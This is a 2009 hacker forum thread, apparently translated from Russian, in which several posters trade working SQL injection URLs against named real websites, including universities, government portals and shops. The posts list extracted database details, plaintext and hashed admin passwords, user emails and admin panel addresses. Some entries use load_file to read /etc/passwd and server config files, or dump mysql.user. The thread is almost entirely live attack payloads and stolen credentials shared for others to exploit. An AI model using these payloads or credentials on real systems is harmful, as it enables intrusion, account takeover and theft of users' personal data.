View full version : SQL Injections
.:[melkiy]:.
22.03.2009, 14:40
http://www.mizangroup.jo/inner_links_en.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10--
Database Version: 5.0.67-community-log
Database name: mizangro_mizan
User name: mizangro_usermiz@localhost
]http://www.cdk.ru/event.php?id=-65'+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8,9,10,11,12,13--+
Database Version: 4.1.20-log
Database name: web60_db1
User name: web60_u1@localhost
log : :(
pass: qwer123
http://www.sesame-ip.eu/public/educ_cruise.php?cruise=-1+union+select+1,2,3,4,concat_ws(0x3a3a,login,pwd, user()),6,7,8,9,10,11,12+from+login+limit+0,1/*
Looks like a table with the admin accounts, but I couldn't dig up a link to the admin panel.
http://www.pokrishka.ru/discs_auto.html?model=-2500+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3--
Database Version: 5.1.30-community
Database name: shina
User name: shina@localhost
I found 2 admin panels here
http://www.pokrishka.ru/admin.php
http://www.pokrishka.ru/partners/admin.php
I pulled 2 login/password pairs out of the database
administrator:shina33
admin:pokrishka33
only the second login:pass works, in the second admin panel...
http://www.autoshkola.com.ua/index.php?page=photo&lang=rus&idpr=37+union+select+1,concat_ws(0x3a,database(),v ersion(),user()),3,4,5--
4.1.22-standard-log
autos_webmix
autos_webmix@localhost
http://yulis-ek.ru/inner.php?all_news&details=-4+union+select+1,2,3,4,5,6,7,8,9,0,1--
Database Version: 4.0.24_Debian-10sarge2-log
Database name: yulis-ek
User name: yulis-ek@localhost
output is in the title
http://www.shinexpress.ru/all_info.php?cat_info=3+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7--
5.0.67-percona-b5-log:st176-web:st176-web@localhost
http://www.autoweek.com.ua/modules.php?op=modload&name=News&file=article&sid=-2108+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1--
4.1.22-log:autoweek:u_autoweek@localhost
http://finnews.ru/exch_punkts.php?region=-1+UNION+SELECT+concat_ws(0x3a,login,passwd,fio,per m)+from+t_users+limit+5,1--&curr=USD
Database Version: 5.0.67-log
Database name: u13279
User name: u13279@10.10.223.209
http://www.consumer-education.eu/?f_cid=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,Lo ginName,LoginPass,Email),10,11,12,13,14+from+_tabU zivatele/*
Login:SuperAdmin
pass:ASAP
Query for the admins.
http://www.consumer-education.eu/admin/ logging in.....
.:[melkiy]:.
22.03.2009, 20:19
http://www.onespiritmartialarts.com/information.php?cat=news&id=-1+union+select+1,2,3,4,5,6--
Database Version: 5.0.21-standard
Database name: onespirit_db
User name: user_onespirit@localhost
Users:
Website of the city of Kharkov
http://www.kharkov.ua/industry/dblist.phtml?prom=-33+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1--
4.0.26-log:poisk:poisk@localhost
_http://www.regentherapy.com/back.php?id=-58'+union+select+1,2,version(),4,5,6,7/*
4.1.22-standard
SAMARA Today
http://www.samaratoday.ru/news.php?id=-166793+union+select+1,2,3,4,5,concat_ws(0x3a,versi on(),database(),user()),7,8,9,0,1,2,3,4,5,6,7--
Database Version: 5.0.45
Database name: samaratoda_news
User name: samaratoda_news@localhost
the USERS table has only 2 records:
[1]:1:Светлана:111111:svgor@bk.ru
[2]:2:Alex:8e956352ad5b3a54076586b4f612b601:balex42@g mail.com
couldn't crack the second hash)
mailbrush
23.03.2009, 00:39
http://www.kcsoul.com/urban-events-calendar/detail.php?eid=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28
user() : database() : version()
sherryml_genuser@localhost : sherryml_db : 5.0.45-community
ПаВлУшКа
23.03.2009, 00:49
http://www.ppi-jepang.org/print.php?id=-61+union+select+1,2,3,version(),5,6,7--
http://ebursa.depdiknas.go.id/pustaka/ptk/record.php?id=-28%20union%20select%201,2,table_name%20from%20info rmation_schema.tables--
mailbrush
23.03.2009, 01:10
http://www.mef.gov.kh/new_mef/macroeconomic-detail.php?eid=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6
user() : database() : version()
mefgovkh_web@216.65.1.253 : mefgovkh_web : 5.0.32-Debian_7etch5~bpo31+1-log
http://www.passionforstone.eu/index.php?id_sect=-1+union+select+concat_ws(0x3a3a,user(),database(), version())--
Admin panel at: http://www.passionforstone.eu/admin/login.php
The database has no fields responsible for authentication. Either it's privilege separation or it's hard-coded in files.
laedafess
23.03.2009, 01:39
http://www.foresia.com/images/index.php?pageid=217204'+union+select+1,2,concat_w s(0x3a,user(),database(),version()),4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+--+
user(): Stamco02@stamco.mynewserver.com
database(): stamco
version(): 4.1.22
PR: 3
---------------------------------------------------
http://www.kincrome.com.au/web/media/media.php?AID=-220'+union+select+1,2,3,concat_ws(0x3a,user(),data base(),version()),5,6,7+--+
http://www.kincrome.com.au/web/media/media.php?AID=-220'+union+select+1,2,3,load_file('/etc/passwd'),5,6,7+--+
user(): b2becat@10.0.0.16
database(): Kincrome
version(): 5.0.56sp1-enterprise-gpl
PR: 4
---------------------------------------------------
http://www.mirabili.it/fotobis.php?idevento=-29+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6/*
user(): mirabilidb@localhost
database(): mirabili_it
version(): 4.0.24_Debian-10sarge3-log
PR: 4
http://trentondevils.com/page.php?pid=-228+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
Database Version: 4.1.20-log
Database name: tdevils_db
User name: tdevils@localhost
http://www.initiativeforpeacebuilding.eu/resource.php?c=-1+union+select+1,concat_ws(0x3a3a,user(),version() ,database()),3,4--
http://www.initiativeforpeacebuilding.eu/Admin <- Basic auth
M.W.N.N.
23.03.2009, 04:48
http://www.vsmc.com.vn/news_detail.php?id=19+union+select+1,2,concat(vers ion(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21+limit+1,1
version():5.0.67-community
database():vsmccom_datavsmc
user():vsmccom_sisoft@localhost
ПаВлУшКа
23.03.2009, 15:32
http://www.textile.web.id/member/index.php?id=-21+union+select+version(),2,3,4--
http://www.iwandarmansjah.web.id/medical.php?id=-309+union+select+1,2,3,unhex(hex(version())),5,6,7 ,8,9--
.:[melkiy]:.
23.03.2009, 16:25
http://www.zeland.ru/index.php?inside=1&page=news&id=-12+union+select+1,2,3,4,5,6--
Database Version: 5.0.67
Database name: b30500_zelan
User name: u30500@78.108.85.11
http://www.lbn.lv/?op=news&id=-1+union+select+1,2,3,4,5--
Database Version: 5.0.24-community-nt-log
Database name: lbn
User name: lbndb@localhost
Pull from USERS
http://www.alatus.ru/?a=news&id=-87+union+select+1,2,3,4,5/*
Database Version: 4.1.22-standard-log
Database name: alatusr_1
User name: alatusr_user@localhost
ТОВ "Укрреставрацiя"
http://www.ukrrest.kiev.ua/?module=building&id=-5+union+select+1--
Database Version: 5.0.22
Database name: ukrrest_main
User name: ukrrest_root@localhost
Login:admin
Pass:b0fb7de8ea0d4fce95fc0e4ded766b30: 93UhAwTSYRUL4V7p
--
Login::ppfnetua
Pass:c82982351c43978caa37cbc4df9c8807: kwfgOSZQxjGL4bDE
Pull from jos_users
http://www.frentanarent.it/sezioni.php?titolo=news&id=-1+union+select+1,2,3,4,5,6--
Database Version: 5.0.22
Database name: frentana
User name: ftp_frentana@localhost
Login: novatek
Pass: 8b6068265e60d456b7b25160f965bc24 : ??
spherics
23.03.2009, 18:25
http://www.lensmodern.com/gallery_list.php?id=980986543+union+select+1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,version() ,user(),database()),16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37--
Database Version: 5.0.37
Database name: lensmodern_db
User name: lensmodern_user@localhost
Admins
http://www.lensmodern.com/gallery_list.php?id=980986543+UNION+SELECT+1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,CONCAT(0x3a,(SELECT+CONC AT(a_username,0x3a,a_password,0x3a,a_email)+FROM+l ensmodern_db.admin+LIMIT+0,1),0x3),16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--
a_username : a_password : a_email
.:[melkiy]:.
23.03.2009, 18:48
Fish House - always for you (UA)
http://fishhouse.ua/index.php?page=news&id=-1+union+select+1,unhex(hex(concat_ws(0x3a,version( )))),3,4--
Database Version: 5.0.45-log
Database name: farafon_wp
User name: farafon_fish@localhost
Login: admin
Pass: $P$BQDOb1JojYXIycHmyQPf.77BLr9mMS : ??
-------------------------------------------------------------------------------------------------------------
Internet conference (RU)
http://www.omskedu.ru/conferens/?act=news&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Database Version: 5.0.45
Database name: omskedu4
User name: omskedu4@localhost
There is access to mysql.user
Users:
spherics
23.03.2009, 19:26
http://mysecret.tv/secret.php?id=9798756454332+union+select+1,2,conca t_ws(0x3a,version(),user(),database()),4,5,6,7--
Database Version: 5.0.58
Database name: mysecret
User name: mysecret@localhost
http://mysecret.tv/secret.php?id=9798756454332+UNION+SELECT+1,2,CONCA T(0x3a,(SELECT+CONCAT(username,0x3a,password,0x3a, access,0x3a,email)+FROM+mysecret.user+LIMIT+1,1),0 x3a),4,5,6,7--
username : password : access : email
:admin : mys3cr3ts : 10 :stdrovia@digitaldk.com
http://www.universalexportltd.com/view_item.php?id=108098097650+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29--
Database Version: 4.1.20
User name: exportUser@localhost
Database name: universalexport
TGP
http://www.selfpp.com/gallery.php?ID=9809879698702+union+select+1,2,3,4, 5,6,concat_ws(0x3a,version(),user(),database()),8, 9--
Version: 4.1.22-standard-log
User: selfpp_selfpp@localhost
Database: selfpp_tgp6
site: http://www.homeobooks.ru
http://www.homeobooks.ru/books.php?id=-307+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24--
database : 5.0.67-log
name_data_base : u18936
user : u18936@10.10.153.183
login : admin
pass : uchisprogat
users
sma111:npkssk
shild:shild
+limit+1,1+
http://www.gkh-reforma.ru/forum/view_all_topic.php?m_id=466+union+select+1,2,conca t_ws(0x0A,database(),version(),user()),4,5,6,7
database u40032_forum
version 5.0.67-log
user u40032@10.10.223.205
sql-inj in the frb 4.0 lite engine :)
someone poke at it :)
http://www.bgmim.org/enlinks.php?id=-3+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10
Database Version: 5.0.67-community
Database name: avis91_euro26
User name: avis91_admindb@localhost
http://www.bgmim.org/admin
radina:803058
http://all-photo.ru/all-moscow/index.ru.html?kk=efc0be737d&img=-20899+union+SeLect+1--
Database Version: 4.1.22
Database name: photo
User name: photo@all-photo.ru
ПортТелеком
http://www.ptkom.ru/new/news/?id=-23+union+select+1,2,3,column_name,5,6+from+INFORMA TION_SCHEMA.columns+where+table_name=0x70746b6f6d5 f61646d+limit+1,1--
user(): draft@localhost
database(): draft
version(): 5.0.60
PR=5
TIC=30
table ptkom_adm
http://www.ptkom.ru/new/news/?id=-23+union+select+1,2,3,concat(id,0x3a,login,0x3a,pa ss),5,6+from+ptkom_adm+limit+0,1--
id:login:рass
1:рtkom_user:9d08d11a016deb735240e8bbb2e13788
http://www.hoteli.bg/designs/classic2_en.php?id=143+UNION+SELECT+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 ,59,60,61,62,63,64,65,66,67,68,69,concat_ws(0x3a,v ersion(),database(),useR()),71,72,73,74
Database Version: 5.0.67-community
Database name: hotelib_hoteli
User name: hotelib_site@localhost
.:[melkiy]:.
23.03.2009, 23:58
Virtual Radio
http://www.vradio.org/radiostations.php?id=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 4.1.21
Database name: vradio
User name: vradio06@localhost
spherics
24.03.2009, 00:23
https://archserv.arch.vt.edu/equipment/type.php?id=798796959872+union+select+1,2,concat_w s(0x3a,version(),user(),database()),4,5--
Version: 5.0.37
User:search@localhost
Database: archweb
PageRank = 5
http://www.oncars.com/news-blogs/viewStory.php?id=9687687609872+union+select+1,2,3, 4,5,6,7,concat_ws(0x3a,version(),user(),database() ),9,10,11,12,13,14,15--
Database Version: 5.0.51a-18-log
Database name: oncarsdata
User name: oncars_admin@64.22.128.61
M.W.N.N.
24.03.2009, 00:47
http://www.sozialnetz-mil.de/details2.php?id=77%27+union+select+1,concat(versio n(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47+limit+1,1/*
version():5.0.32-Debian_7etch8-log
database():db1032133-test
user():dbu1032133@localhost
http://www.sushi-market.ru/catalog.php?view=product&id_kuhnya=1&id_cat=4&id=-1+UNION+SELECT+concat(login,0x3a,pass),2,3+FROM+us ers+LIMIT+0,1/*
version 4, output is in the title
Admin panel is here http://www.sushi-market.ru/admin
Where the admins are stored - no idea
spherics
24.03.2009, 01:03
PageRank = 6
http://www.sunyopt.edu/faculty/viewprofile.php?ID=92+union+select+1,2,3,4,5,conca t_ws(0x3a,version(),user(),database()),7,8,9,10,11 ,12,13--
Database Version: 5.0.45
Database name: FAD
User name: admin@localhost
http://www.sunyopt.edu/faculty/viewprofile.php?ID=92+union+select+1,2,3,4,5,conca t_ws(0x3a,user,password),7,8,9,10,11,12,13+from+my sql.user--
pma_0QzUtRnrJLEV : 17262bd87c9d234c
admin : 63da210b5b938bd4
test : 22adbe442782abc1
Reading: etc/passwd
http://www.sunyopt.edu/faculty/viewprofile.php?ID=92+UNION+SELECT+1,2,3,4,5,CONCA T(0x3a,LOAD_FILE(0x2F6574632F706173737764),0x3a),7 ,8,9,10,11,12,13--
Reading: /etc/httpd/conf/httpd.conf
http://www.sunyopt.edu/faculty/viewprofile.php?ID=92+UNION+SELECT+1,2,3,4,5,CONCA T(0x3a,LOAD_FILE(0x2F6574632F68747470642F636F6E662 F68747470642E636F6E66),0x3a),7,8,9,10,11,12,13--
M.W.N.N.
24.03.2009, 02:32
http://pascn.pids.gov.ph/resprojects.phtml?stid=4+union+select+1,concat(ver sion(),0x3a,database(),0x3a,user()),3,4/*
version():4.0.23-standard
database():APEC
user():pascn@203.167.111.188
http://www.chambers-bank.com/location_details.php?id=1+union+select+1,2,concat( version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9 ,10,11,12+limit+1,1/*
version():4.1.22
database():CHECKIN_DB
user():CHECKIN_ADMIN@216.81.70.64
dr.Pilulkin
24.03.2009, 03:13
http://www.astrofest.ru/page.php?id=-1303+union+select+1,2,concat_ws(0x3a,user(),versio n(),database())--
ostapenko_afest@localhost:4.1.22:ostapenko_afest
http://www.beermachine.ru/katalog.php?id=-5+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4--
u28651@10.10.153.174:5.0.67-log:u28651
.:[melkiy]:.
24.03.2009, 04:15
http://www.divoclub.ru/katalog.php?id=-20+union+select+1+from+mysql.user--
Database Version: 4.1.16
Database name: DIP
User name: root@localhost
There is access to mysql.user
mailbrush
24.03.2009, 11:31
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),dat abase(),version()),25,26,27,28,29,30,31,32,33,34.h tml
user() : database() : version()
karabas_svalka2@localhost : karabas_svalka2 : 5.0.67-community
http://forum.antichat.ru/showthread.php?p=1187222#post1187222
spherics
24.03.2009, 17:40
http://www.dosgraveyard.com/game.php?id=7987986446+union+select+concat_ws(0x3a ,version(),user(),database()),2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18--
Database Version: 5.0.51a
Database name: dosgraveyard
User name: dosgraveyard@77.232.68.30
http://www.dosgraveyard.com/game.php?id=7987986446+UNION+SELECT+CONCAT(0x3a,(S ELECT+CONCAT(username,0x3a,password)+FROM+dosgrave yard.members+LIMIT+0,1),0x3a),2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18--
: abdalis : 06c219e5bc8378f3a8a3f83b4b7e4649
: diggyboy : 06c219e5bc8378f3a8a3f83b4b7e4649
http://stardustobservatory.org/image.php?id=798798654479+union+select+1,2,3,conca t_ws(0x3a,version(),user(),database()),5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20--
Database Version: 5.0.67.d7-ourdelta-log
Database name: stardust
User name: stardust@208.109.181.232
http://www.crawfordhanus.com/single.php?id=80980975644+union+select+1,concat_ws (0x3a,version(),user(),database()),3,4,5,6,7,8,9,1 0,11,12,13,14--
Version: 4.0.27-standard
User: crawford_gallery@localhost
Database: crawford_chphoto
.:[melkiy]:.
24.03.2009, 19:22
http://www.realtyplanex.com/estate.php?id=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 4.1.10-standard
Database name: planexestates
User name: planexestates@localhost
Table users
http://www.pickereurope.org/page.php?id=-20+union+select+1,2,3,4--
Database Version: 5.0.68
Database name: picker
User name: pickeruser@localhos
http://www.baxtercountysheriff.com/page_view.php?id=-20+union+select+1,2,3,4,5,6--
Database Version: 5.0.45
Database name: bcsd_dymin
User name: bcsd@localhost
ph1l1ster
24.03.2009, 21:21
atlantic.edu
PR: 7
http://www.atlantic.edu/alumni/article.php?id=72+union+Select+1,aes_decrypt(aes_e ncrypt(concat(Version(),0x3a,Database(),0x3a,User( )),0x71),0x71),3,4,5,6,7/*
Database Version: 4.1.12-log
Database name: www_alumni_news
User name: jdagosti@localhost
reslife.rit.edu
PR: 6
http://reslife.rit.edu/publications/opendoor/article.php?id=-72+union+select+1,concat(username,0x3a,password),3 +from+users--
Database Version: 5.0.77
Database name: reslife
User name: reslife@sc3app09.rit.edu
http://www.romaniincanada.org/
http://www.romaniincanada.org/bucate/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_password,3,4,5,6,7+from+secu rity_users-- (Passwords)
http://www.romaniincanada.org/bucate/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_login,3,4,5,6,7+from+securit y_users-- (Users)
admin:ch8920an
thor:ch8920an
Database Version : 5.0.75-community-log
Database name: romaniin_retete
User Name : romaniin_admin@localhost
http://www.lowcarbrecipes.org/
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_login,3,4,5,6,7+from+securit y_users-- (Users)
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_password,3,4,5,6,7+from+secu rity_users-- (Passwords)
admin:8624266
Database Version : 5.0.67-community
Database name : recipedb
User Name : root@localhost
Europa Plus - Your favorite radio!
http://europaplus72.ru/index.php?go=full_afisha&id=-24+union+select+1,2,3,concat(user(),0x3a,version() ,0x3a,database()),5,6--
user(): srv11964_erpusr@c11-w.ht-systems.ru
database(): srv11964_erp
version(): 5.0.75-log
PR=3
FARM.RU :: Stationery and office supplies
http://www.farm.ru/region-cinfo.htm?id=-24+union+select+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15--
user(): farm@zvm18.host.ru
database(): farm
version(): 4.0.27-log
TIC=275
PR=4
table users
http://www.farm.ru/region-cinfo.htm?id=-24+union+select+1,concat(login,0x3a,password),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+users+limit+0,1--
login:рassword
Катерина:ubrfkuaf
IgorDorohov:Dorohov_pas
lyumna:p8yYpn
тринадцатый:6kr176e8
sm:12139
MRC-modélisme
http://www.mrcmodelisme.com/fiche_helico.php?id=-24+union+select+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30--
user(): mrcmodelismecom@88.191.253.175
database(): mrcmodelismecom
version(): 5.0.45-Debian_1ubuntu3.3-log
PR=3
http://www.mrcmodelisme.com/fiche_helico.php?id=-24+union+select+1,table_name,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30+from+information_schema.tables+limit+0,1--
reading the tables.
ezo.hu - Home page
http://www.ezo.hu/index.php?id=24+and+substring(version(),1,1)=5--
branch 5
PR=4
Official website of the Institute of Cytology and Genetics, SB RAS
http://www.bionet.nsc.ru/cgi-bin/boardicg/catalog.pl?id=24+and+substring(version(),1,1)=5/*
branch 5
TIC=1000
PR=5
http://www.niihim.ru/news.php?id=1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5--
Database Version : 4.1.22
Database name : niihim_db
User name : niihim_mysql@10.1.39.197
admin :
http://www.niihim.ru/news.php?id=1+union+select+1,concat _ws(0x3a,login,password),3,4,5+from+admin--
admin:niihim_w3
http://www.niihim.ru/admin/login.php
http://www.webaruhazak.net/cat.php?id=-50+union+select+1,2/*
Database Version: 4.1.14
Database name: wscenter
User name: wscenter@localhost
2 Metis
http://www.lowcarbrecipes.org there's load_file there too
cpanel
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&course_id=-7+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x 7873716C696E6A626567696E,LOAD_FILE(0x2F7661722F637 0616E656C2F6370616E656C2E636F6E666967),0x7873716C6 96E6A656E64),0x71),0x71),3,4,5,6,7--
DezMond™
25.03.2009, 00:04
http://www.jcp-pt.org/noticias.php?id=-420+union+select+1,2,3,version(),5,6,7/*&categoria=3&categoria2=0&categoria3=0
http://www.eduff.uff.br/noticias.php?id=-408+union+select+1,2,3,version()/*
M.W.N.N.
25.03.2009, 00:19
http://kvs.gov.ua/info/news/news.php?id=17+union+select+1,2,concat(version(),0 x3a,database(),0x3a,user()),4,5/*
version():4.1.22
database():kvsgov
user():u_kvsgov@localhost
.:[melkiy]:.
25.03.2009, 00:32
http://www.propertysalecenter.com/fullnews.php?id=-20+union+select+1,2,3,4,5--
Database Version: 5.0.75-community-log
Database name: manwomen_propertysalecenter
User name: manwomen_coy0@localhost
ph1l1ster
25.03.2009, 01:52
threeoneg.com
Database Version: 5.0.45
Database name: threeone_catalog
User name: threeone_catalog@localhost
http://www.threeoneg.com/31G/shop.php?action=view&id=-17+union+select+1,2,concat(user(),0x3a,version(),0 x3a,database()),4,5,6,7,8,9
ravenfiles.com
Database Version: 4.1.22-standard
Database name: rgnmain1_ravenfiles
User name: rgnmain1_admin@localhost
http://www.ravenfiles.com/file.php?id=-14+union+Select+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5,6,7,8,9,0,11
expovest.ro
Database Version: 4.1.22-log
Database name: db16796
User name: u16796@81.28.232.69
http://www.expovest.ro/general_en/news.php?id=-173+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(us er(),0x3a,version(),0x3a,database())
businessmachine.ro
Database Version: 5.0.45
Database name: bm
User name: bmadm@localhost
http://www.businessmachine.ro/afaceri/news.php?id=-51+union+select+1,concat(username,0x3a,userpass),3 ,4,5+from+users
gts-automatizari.ro
P.S: admin:21232f297a57a5a743894a0e4 (what type of hash is this?)
Database Version: 5.0.67-community-log
Database name: gtsautom_web
User name: gtsautom_web@localhost
http://www.gts-automatizari.ro/industrial-automation/news.php?lg=1&id=-51+union+select+1,2,3,4,concat(user,0x3a,passwd),6 ,concat(user,0x3a,passwd),8,9,0,1,2,3+from+gts_adm in
ПаВлУшКа
25.03.2009, 02:25
http://www.mairie-yako.bf/site/suite.php?id=-101+union+select+1,2,version(),table_name,5+from+i nformation_schema.tables--
http://www.lovea2.com/php/tourguide.php?id=-6+union+select+1,version(),3--
nazgul_mk
25.03.2009, 05:42
SlavutichCity.net
http://slavutichcity.net/modules.php?op=modload&name=Subjects&file=index&req=listpages&subid=-1+union+select+1,concat(database(),0x3a,version(), 0x3a,user()),3/*
database(): slavutic_postnuke
version(): 4.1.22-standard
user(): slavutic_pnuker@localhost
ADMIN:
Boroda:gjhnfk
Assembler
25.03.2009, 11:18
http://www.globaltown.ru
PR:1
Version: 5.0.67
http://www.globaltown.ru/vip.php?id=99999999999999%20union%20select%201,ver sion(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23--
spherics
25.03.2009, 17:23
How about that!
PageRank - 8
http://www.osu.edu/news/newsitem23798698757/**/union/**/select/**/1,2,concat_ws(0x3a,version(),user(),database()),4, 5,6,7,8,9,10,11,12,13,14,15,16--
Database Version: 5.0.27-log
Database name: news_db
User name: ted@www5.it.ohio-state.edu
http://www.osu.edu/news/newsitem23798698757/**/union/**/select/**/1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10,1 1,12,13,14,15,16/**/from/**/mysql.user--
Reading etc/passwd
http://www.osu.edu/news/newsitem23798698757/**/UNION/**/SELECT/**/1,2,CONCAT(0x3a,LOAD_FILE(0x2F6574632F706173737764 ),0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16--
DezMond™
25.03.2009, 17:25
http://www.alternativa3.com/2006/noticias.php?id=-690'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
.:[melkiy]:.
25.03.2009, 17:50
Online lighting store
http://isvet.ru/products.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--
Database Version: 4.1.11-Debian_4sarge5-log
Database name: z34890_isvet
User name: z34890_isvet@77.221.130.6
Login: silsergey
Pass: 8e4e4aae7d65051f3424b4fba909a00f : cgiperl
PR: 6
TIC: 850
http://yspu.yar.ru/service/dissert/?_mode=3&idDis=-1+UNION+SELECT+1,2,convert(concat_ws(0x3a,+user(), +version(),+database())+using+cp1251),4,5,6,7,8,9, 10,11,12,13,14/*
User name: dissert@localhost
Database version: 4.1.14-log
Database name: Dissert
spherics
25.03.2009, 20:29
PR - 6
http://www.rlc.edu/pressroom/newsstory.php?id=902'%20and%20@@version%3E1--%20and%20'1'='1
Version : Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.rlc.edu/pressroom/newsstory.php?id=902'%20and%20db_name()%3E0--%20and%20'1'='1
Db Name : WebDB
http://www.rlc.edu/pressroom/newsstory.php?id=902'%20and%20user%3E0--%20and%20'1'='1
Current User : phpuser
http://www.bspu.ru/index.php?module=Topics&func=view&topicid=-1+UNION+SELECT+1,pn_uname,pn_email,4,5,pn_pass+fro m+md_users+limit+1,1/*
Database version: 4.0.27-standard-log
Database name: bspu
User name: bspu@localhost
http://www.disco.bg/designs/classic2_en.php?id=-192+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64, 65,66,concat_ws(0x3a,version(),database(),user()), 68,69,70,71--
Database Version: 5.0.67-community-log
Database name: discobg_disco
User name: discobg_site2@localhost
http://www.invitro-marketing.com/projects_details.php?id=-32+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user())&start=0&client=&type=-1&type_service=-1
Database Version: 5.0.67-community
Database name: invitro_Invitro
User name: invitro_site@localhost
mailbrush
26.03.2009, 11:52
All injections were checked with my Antiboyan (http://bestquest.info/php/check.php), then added to its database.
http://q3.bpnet.ru/themes/bismarck/gamestat.php?gameID=121269546138015100+union+selec t+concat_ws(0x3a,user(),database(),version()),2/*&config=cfg-default.php
user() : database() : version()
root@localhost:vsp:4.1.22-log
http://q3.bpnet.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+user,file_priv+from+mysql.user+/*&config=cfg-default.php
file_priv = Y
http://q3.bpnet.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2+/*&config=cfg-default.php
/etc/passwd
http://q3.tupoleva.net/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
vsp@localhost : vsp : 4.1.22
http://195.222.33.230/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
cod2_stats@localhost : vsp : 4.1.20-community-nt
http://partymanproductions.com/WolfStats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
joatmon@localhost : joatmon_wolfstat : 5.0.37-standard
http://quake3.perm.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
quake3@localhost : quake3 : 5.0.32-Debian_7etch8-log
http://nlcgaming.aj-services.com/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
apcyberax@localhost : nlcgaming : 5.0.45
file_priv=Y
